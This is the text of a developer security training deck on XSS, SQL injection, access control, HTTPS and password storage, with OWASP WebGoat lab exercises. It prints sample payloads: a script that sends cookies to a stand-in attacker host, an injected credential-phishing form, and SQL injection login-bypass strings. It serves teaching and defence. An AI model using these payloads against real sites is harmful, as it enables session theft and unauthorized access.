Developer-first security Integrating Security into

Development

Michael Coates !

michael@ShapeSecurity.com michael-coates.blogspot.com

@_mwc

About Me

michael@shapesecurity.com

Reality

“The global cost of cybercrime is greater than the combined effect on the global economy of trafficking in marijuana, heroin and cocaine”

h"p://www.theregister.co.uk/2011/09/07/cost_is_more_than_some_drug_trafficking  h"p://uk.norton.com/content/en/uk/home_homeoffice/html/cybercrimereport/  

!

Data Loss & Breaches

Verizon Data Breach Report 2013datalossdb.org

Outside Attackers

Verizon Data Breach Report 2013datalossdb.org

Security - Into The Details• Sample and Demo of Top Application Risks

— Cross Site Scripting, SQL Injection, Access Control

• Who’s Monitoring Your Traffic?— Encrypting in Transit

• Secure Data Storage & Protection — Correct Password Storage & Data Protection

• Growing Threats Plaguing Applications

WARNING

Security Testing is

ILLEGAL ON UNAUTHORIZED SYSTEMS

Cross Site Scripting SQL Injection Access Control

3 Dangerous Vulnerabilities

What are Web Requests

• Open console & enter the following: telnet google.com 80GET / HTTP/1.1

• Hit return 2 times

Cross Site Scripting (XSS)• Problem: User controlled data returned in HTTP

response contains HTML/JavaScript code

• Impact: Session Hijacking, Full Control of Page, Malicious Redirects

• Basic XSS Test: " ><script>alert(document.cookie)</script>

• Cookie Theft Example: "><script>document.location='http://attackersite/ '+document.cookie</script>

XSS Behind The Sceneshttp://shinypage.com?user=Bob

<div>Glad to see you <b>Bob</b></div>HTML Source

<h1>Glad to see you <%= request.getParameter("name") %></h1>JSP Code

Rendered HTML

XSS Behind The Scenes

http://shinypage.com?user=friend</b><br><form method=”post”

action=”badsite.com/login”> Login: <input type="text"

name="username"><br> Password:<input type="password"

name="password"><input type="submit" value="Submit" /></form>

XSS - Injecting HTML

Rendered HTML

Cross Site Scripting• Cross Site Scripting typically uses JavaScript to

do bad things

• Steal session cookies <script>alert(document.cookie)</script>

• Redirect to bad pages <script>window.location = "http://evilsite.com/"</script>

• Rewrite page on the fly

Lab! - Reflected XSS

Reflected XSS Lab• Lesson: Cross-Site Scripting->Reflected

XSS Attacks

• Proxy Not Needed

Lab! - Stored XSS

Stored XSS Lab• Lesson: Cross-Site Scripting-

>Stored XSS Attacks

• Proxy Not Needed

XSS Prevention• Solution

1. Output Encoding - converts command characters to benign characters for display 2. Input Validation

< > “ ‘ &

&lt; &gt;

&quote; &#x27; &amp;HTML Encoding

<h1>Glad to see you <%=encodeForHTML( request.getParameter("name") ) %></h1>

XSS Attempt Revisited

http://shinypage.com?user=friend</b><br><form method=”post”

action=”badsite.com/login”> Login: <input type="text"

name="username"><br> Password:<input type="password"

name="password"><input type="submit" value="Submit" /></form>

Safe Handling

Glad to see you friend</b> <br><form method="post" action="badsite.com/

login"> Login: <input type="text" name="username"><br>

Password:<input type="password" name="password"><input type="submit" value="Submit" /></form>

Rendered HTML

XSS Resources

• OWASP XSS Prevention Cheat Sheet - http://bit.ly/XSS-OWASP

• Content Security Policy - http://bit.ly/CSP-OWASP

• OWASP XSS Overview - http://bit.ly/OWASPXSS

SQL Injection• Problem: User controlled data improperly used with SQL

statements

• Impact: Arbitrary SQL Execution, Data Corruption, Data Theft

• Basic SQL Injection Tests:OR 1=1 --' OR '1'= '1'--

• Example Vulnerable Query:sqlQ = “Select user from UserTable where name= '+username+ ' and pass = '+password+ ' ”

Lab! - SQL Lesson

SQL Injection• Lesson: Injection Flaws ->

Lab: SQL Injection -> Stage 1: String SQL Injection

• Proxy Needed

• Objective: Bypass the login page by inserting “control” characters. Login as “Neville” w/o knowledge of the password

SQL Injection

• HTTP Postemployee_id=112&password=x' OR ‘1'='1 &action=Login

• Vulnerable SQLSelect user from UserTable where name= '+username+ ' and pass = '+password+ ‘

• Resulting StatementSelect user from UserTable where name= '112' and pass = 'x' OR '1'='1'

• Result: ... name = ' 112 ' and pass = 'x ' OR TRUE

SQL Injection

• Parameterized QueriesNo confusion with control characters Example: would look for password of ‘ or ‘1’=’1

• Input Validation Are special characters needed for most fields?What about non-printable characters %00-%0A?

SQL Injection Resources

• https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

Access Control• Problem: Developers assume some parts of app can’t be seen,

tampered with or invoked by the user

• Impact: Unauthorized data access, access to privileged functionality

• Basic Access Control Test: Inspect HTTP requests - iterate numbers, guess other values for arguments

• Access Control Failure Example:!

• http://somebadbank.com/showacct?id=101

• http://somebadbank.com/showacct?id=102

Lab! - Access Control

Access Control Violation• Lesson: Access Control Flaws-

>LAB: Role Based Access Control->Stage 1: Bypass Business Layer Access Control

• Proxy Needed

• Objective: Find way to execute “delete” functionality using Tom’s account. Delete account “tom”

Access Control Violation• Hint: Login with Tom and perform available

actions (search staff, view profile). Figure out how action name is sent to server

POST /webgoat/attack?Screen=43&menu=200 HTTP/1.1 Host: localhost !employee_id=105&action=ViewProfile

Strong Access Controls• Access Control Performed Server Side

• Never Relies Upon “Security by Obscurity”

• Be Careful with Identifiers (e.g. id=123)

• Attacker Can Send Anything in Request

• Presentation Layer Controls Can Not Enforce Access Control

Access Control Resources

• https://www.owasp.org/index.php/Access_Control_Cheat_Sheet

Who’s Monitoring Your Traffic?

Insecure Session Management

• Secure login over HTTPS

• Password submitted encrypted

• Immediate redirect to HTTP

• Session ID sent cleartext <-- vulnerability point

https://site.com/login

http://site.com/profile

Vulnerable Redirects• User requests HTTP page, response redirects

HTTPS

• 302 Response is HTTP <-- Vulnerability Point

Secure Design for Communication

• Use HTTPS Throughout Web Site!

• HTTP Strict Transport Security (HSTS)!

• Opt-in security control

• Website instructs compatible browser to enable STS for site

• HSTS Forces (for enabled site):

• All communication over HTTPS

• No insecure HTTP requests sent from browser

• No option for user to override untrusted certificates

Strict Transport Security• Browser prevents HTTP requests to HSTS site

• Any request to site is “upgraded” to HTTPS

• No clear text HTTP traffic ever sent to HSTS site

• Browser assumes HTTPS for HSTS sites

Secure Data Storage & Protection

Password StorageBad Approaches!

• Your own algorithm

• md5

• sha1

• encryption

• base64 encoding

• rot 13

Good Approach!

• Bcrypt

• PBKDF2

+ Per User Salt

What Are We Protecting?Correct password hashing protects against:!

• Offline attacks of password repository

• Brute Force, Rainbow Attacks

!

!

!

Does not address:!

Guessing easy passwords

Password theft, disclosure

Session Hijacking

Credential Stuffing

Architecture for Sensitive Data

https://site.com internal SSL

web server database

Monitor Database Queries &

Response Size

Encrypting Sensitive Data in Database

databaseCustomer/Group Encryption Key

User Data

Key Encrypting Key

Encrypted [Customer/Group Encryption Key]

Decrypt

Encrypt

Encryption within Database Unique keys per data regionKey encrypting keys Hardware Security Modules (

Hardware Security Module

Growing Threats Plaguing Applications

Denial of ServiceDenial of Service (DOS)

Distributed Denial of Service (DDOS)

Denial of Service

Application Layer DDOSNetwork DDOS

site.com/generateReport

Exhaust Network!Bandwidth

Exhaust Server !CPU/Memory

Application Denial of Service

Traditional Network DDOS !

• overwhelms target with volume

• exhausts bandwidth / capacity of network devices

• Requires large number of machines

• Defenses: CDN, anti-DDOS services

Application DDOS !

• invokes computationally intense application functions

• exhausts CPU / memory of web servers

• Requires few machines

• Defenses: Few available, must customize

Credential Stuffing

compromised! server!

Stolen Credentials!joe: abc123!sue: password1!bob: MyP0n3y

joe: abc123

https://site.com/login!

sue:password1

Credentials!joe: abc123!sue: password1!bob: MyP0n3y

Take Aways• Understand top security threats and anticipate

potential malicious use of application to design secure code

• Multiple controls possible to protect sensitive data in transit and storage

• Understand emerging threats to plan for appropriate defenses

• Use OWASP BWA Security Lab and learn more!

Thanks!

michael@ShapeSecurity.com

http://michael-coates.blogspot.com

@_mwc

Virtual Security Training Lab Setup

Software

• Vulnerable Server: OWASP’s Webgoat

• Proxy Tool - OWASP’s ZAP (Zed Attack Proxy)

• Browser

• Virtual Machine: OWASP Broken Web App VM

Test Connectivity to VM1.Open Browser

2.Browse to your VM ip (listed in VM login page)

• e.g. http://192.168.56.101

3.Should see OWASP BWA welcome page

4.Error? Check ip address of VM

WebGoat

• Click First Link - OWASP WebGoat version 5.3.x

• Username / Password is guest / guest

Understanding the Proxy• Proxy is middle-man between browser and web

server

• Assists with traffic manipulation & inspection

Web Proxy Web ServerAttacker’s Browser

VMPrimary OS

Understanding the Proxy

Web Proxy Web ServerBrowser

Your Computer

Enabling Proxy

1.Open ZAP

2.Configure Firefox to use proxy

3.Resend Request

4.Confirm received by proxy

5.Forward to web server (vm)

Using A Proxy• ZAP - Configure to listen on 8080

Set Firefox Proxy• Set Firefox proxy to 8080

• Preferences -> Advanced -> Network -> Settings

• Set HTTP Proxy

• Important - clear “No Proxy for” line

Confirm Setup Works

• Refresh Web Browser

• Go to ZAP

• See site in left-hand column

Intercepting Traffic• Add a “breakpoint” by right clicking on the page and choosing

“Break...”

!

!

!

!

• Refresh the webpage - it will hang

• Modify the request as needed, then press the “Continue” button

“Hello World” of Proxies• Lesson: General->Http Basic

• Objective:

• Enter your name into text box

• Intercept with proxy & change entered name to different value

• Receive response & observe modified value is reversed

Web Proxy Web ServerAttacker’s Browser

Joe Sue

euSeuS